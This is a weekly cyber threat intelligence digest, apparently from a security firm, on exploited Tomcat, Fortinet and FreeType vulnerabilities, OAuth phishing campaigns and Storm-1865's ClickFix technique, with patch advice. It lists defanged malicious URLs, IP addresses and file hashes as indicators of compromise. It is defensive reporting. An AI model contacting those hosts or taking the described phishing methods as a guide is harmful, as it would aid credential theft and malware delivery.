Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Threat Actors Actively Exploiting Remote Code Execution Vulnerability CVE-2025-24813 - Threat actors are actively exploiting a remote code execution (RCE) vulnerability in Apache Tomcat versions 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0. M1 to 9.0.98, tracked as CVE-2025-24813. The proof-of-concept (PoC) exploit, released on GitHub on March 13, 2025, abuses Tomcat’s default session persistence mechanism and support for partial PUT requests.
Mora_001 Campaign Exploits Two Fortinet Vulnerabilities (CVE-2024-55591 and CVE-2025-24472) - On March 12, 2025, cybersecurity firm Forescout published a write-up detailing a new ransomware campaign by a threat actor named "Mora_001”. The campaign exploits FortiGate firewall appliances using two Fortinet vulnerabilities (CVE-2024-55591 and CVE-2025-24472) to gain unauthorised access and deliver a new ransomware called "SuperBlack".
Meta Warns of FreeType Vulnerability (CVE-2025-27363) - On March 13, 2025, Meta reported that threat actors may have been actively exploiting CVE-2025-27363, a high-severity vulnerability affecting FreeType, an open-source font rendering library used in various platforms such as Linux, Android, Tizen, Roku, iOS, ChromeOS, ReactOS, GhostScript, Chromium, WebKit, Gecko, and Goanna.
Potential Threats
Phishing Campaign Uses OAuth App to Target 12,000 GitHub Repositories - On March 16, 2025, BleepingComputer reported an ongoing phishing campaign in which unidentified threat actors have already targeted approximately 12,000 GitHub repositories. First identified by cybersecurity researcher Luc4m, the attack impersonates GitHub security alerts to trick developers into authorising a malicious OAuth app, ‘gitsecurityapp.’ The app allows threat actors full control over repositories, user profiles, and GitHub Actions workflows if granted access.
Threat Actors Distribute Counterfeit Adobe and DocuSign OAuth Applications to Steal Microsoft 365 Credentials - On March 13, 2025, Proofpoint identified two phishing campaigns that used malicious OAuth apps to take over Microsoft 365 accounts and spread malware. The threat actors exploited compromised accounts of charities and small businesses to send phishing emails.
Phishing Campaign Impersonating Booking.com and Targeting Hospitality Industry Using Social Engineering - On March 13, 2025, Microsoft reported an ongoing phishing campaign by the Storm-1865 threat group, active since at least December 2024. The campaign targets hospitality organisations across North America, Oceania, Europe, and Southeast Asia, aiming to steal financial data and account credentials through "ClickFix" social engineering attack and malware deployment.
General News
Google buys cloud security provider Wiz for $32 billion - Google is acquiring cloud security company Wiz for $32 billion — the biggest such deal in the tech giant’s history and also the largest corporate acquisition overall this year.
CISA: More than 300 critical infrastructure organisations attacked by Medusa ransomware - An advisory on Wednesday said the group and its affiliates had attacked organisations in the medical, education, legal, insurance, technology and manufacturing industries.
GitHub restores code following malicious changes to tj-actions tool - On Friday, cybersecurity firm StepSecurity warned of a security incident impacting the tj-actions/changed-files GitHub Action, a popular tool used to track file changes and trigger other actions depending on those alterations. The tool has more than 1 million monthly downloads.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Change | Opportunity Change | Intent Change | ||||
|---|---|---|---|---|---|---|---|
| Crazy Hunter Ransomware Group | New | → | Basic | (30) |
↑ 30 |
(35) | ↑ 35 |
| NightSpire Ransomware Group | New | → | Basic | (25) | ↑ 25 | (31) | ↑ 31 |
| Orca Ransomware Group | New | → | Basic | (25) | ↑ 25 | (30) | ↑ 30 |
| Storm-1865 | New | → | Basic | (30) | ↑ 30 | (25) | ↑ 25 |
| dashoar | New | → | Basic | (30) | ↑ 30 | (25) | ↑ 25 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions,
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | ||||
|---|---|---|---|---|---|---|---|
| Hellcat Ransomware Group | ▲ | AsyncRAT | ▲ | CVE-2025-24813 | ▲ | Fast Retailing Co. | ▲ |
| Israel | ▲ | Account Takeover | ▲ | CVE-2024-27564 | ▲ | APA Corporation | ▲ |
| Iran | ▲ | TA0001 (Initial Access) | ▲ | CVE-2025-24071 | ▲ | Israel Defense Forces | ▲ |
| TAG-94 (MirrorFace) | ▲ | REMCOS RAT | ▲ | CVE-2025-29891 | ▲ | Apache Corporation | ▲ |
| DieNet | ▲ | Remote Access Trojan (RAT) | ▲ |
CVE-2024-36904 |
▲ | Biotechnology | ▲ |
Prominent Information Security Events
Threat Actors Distribute Counterfeit Adobe and DocuSign OAuth Applications to Steal Microsoft 365 Credentials.
Source: Insikt Group, Proofpoint | Validated Intelligence Event
Intelligence Cards: Intelligence & Reports
IOC: Hash/MD5 - 85da47ec297740abaf03f3d45aaab169
IOC: URL - hxxps://li[.]tistateronic[.]ru/OqgX
IOC: URL - hxxps://line[.]infoapollocapital[.]buzz
IOC: URL - hxxps://fancy-bush-61e9sydgsyi29s[.]jennifer-may.workers[.]dev
On March 13, 2025, Proofpoint identified two phishing campaigns that used malicious OAuth apps to take over Microsoft 365 accounts and spread malware. The threat actors exploited compromised accounts of charities and small businesses to send phishing emails.
The emails targeted employees at government, healthcare, logistics, and retail organisations, primarily in the United States and Europe. The victims were deceived into providing access to malicious OAuth apps that purported to be Adobe Drive, Adobe Acrobat, and DocuSign.
The malicious apps requested minimal permissions to remain undetected, such as reading profile data, email, and account ID to evade detection. Once authorised, the victims were taken to sites that hosted Microsoft 365 credential-stealing phishing or malware. While Proofpoint could not verify what malware was used, they found threat actors using the ClickFix social engineering method to exploit user trust to gain interaction.
Storm-1865 Phishing Campaign Impersonating Booking.com and Targeting Hospitality Industry Using Social Engineering Technique ClickFix to Deliver Malware.
Source: Insikt Group, Microsoft | Validated Intelligence Event
Intelligence Cards: Intelligence & Reports
IOC: Hash/SHA256 - f87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981e
IOC: Hash/SHA256 - 01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6
IOC: IP - 147.45.44[.]131
IOC: IP - 87.121.221[.]124
On March 13, 2025, Microsoft reported an ongoing phishing campaign by the Storm-1865 threat group, active since at least December 2024. The campaign targets hospitality organisations across North America, Oceania, Europe, and Southeast Asia, aiming to steal financial data and account credentials through "ClickFix" social engineering attacks and malware deployment.
Storm-1865’s attack chain begins with phishing emails impersonating Booking.com, referencing negative guest reviews, reservation inquiries, or account verification requests. These emails contain either PDF attachments or embedded links directing recipients to the fraudulent CAPTCHA page. Using Click Fix technique, the phishing site displays a CAPTCHA that appears to require verification but instead copies a hidden mshta.exe command to the Windows clipboard. It then instructs victims to open the Windows Run dialog, paste the clipboard contents, and execute the command, unknowingly deploying malware.
The ClickFix technique is a widely used method for malware distribution and is not exclusive to Storm-1865. Russian and Iranian state-sponsored threat actors, including APT28 and MuddyWater, have also used this approach. ClickFix exploits user interaction by presenting a seemingly legitimate solution to a perceived issue, leading victims to unknowingly execute malicious commands.
Unlike traditional malware distribution methods, this technique does not rely on a malicious script to propagate malware; instead, victims initiate the execution themselves.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-24813 – To prevent threat actors from exploiting CVE-2025-24813, we recommend updating Apache Tomcat to the fixed versions listed below:
- Apache Tomcat version 11.0.3 or later
- Apache Tomcat version 10.1.35 or later
- Apache Tomcat version 9.0.99 or later
- CVE-2024-55591– Users should upgrade to FortiOS version 7.0.17 or later, and FortiProxy versions 7.0.20 or 7.2.13 or later.
- CVE-2025-24472 – Users should upgrade to FortiOS version 7.0.17 or later, and FortiProxy versions 7.0.20 or 7.2.13 or later
- CVE-2025-27363 - Users are recommended to update their instances to the latest version of FreeType (2.13.3)
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.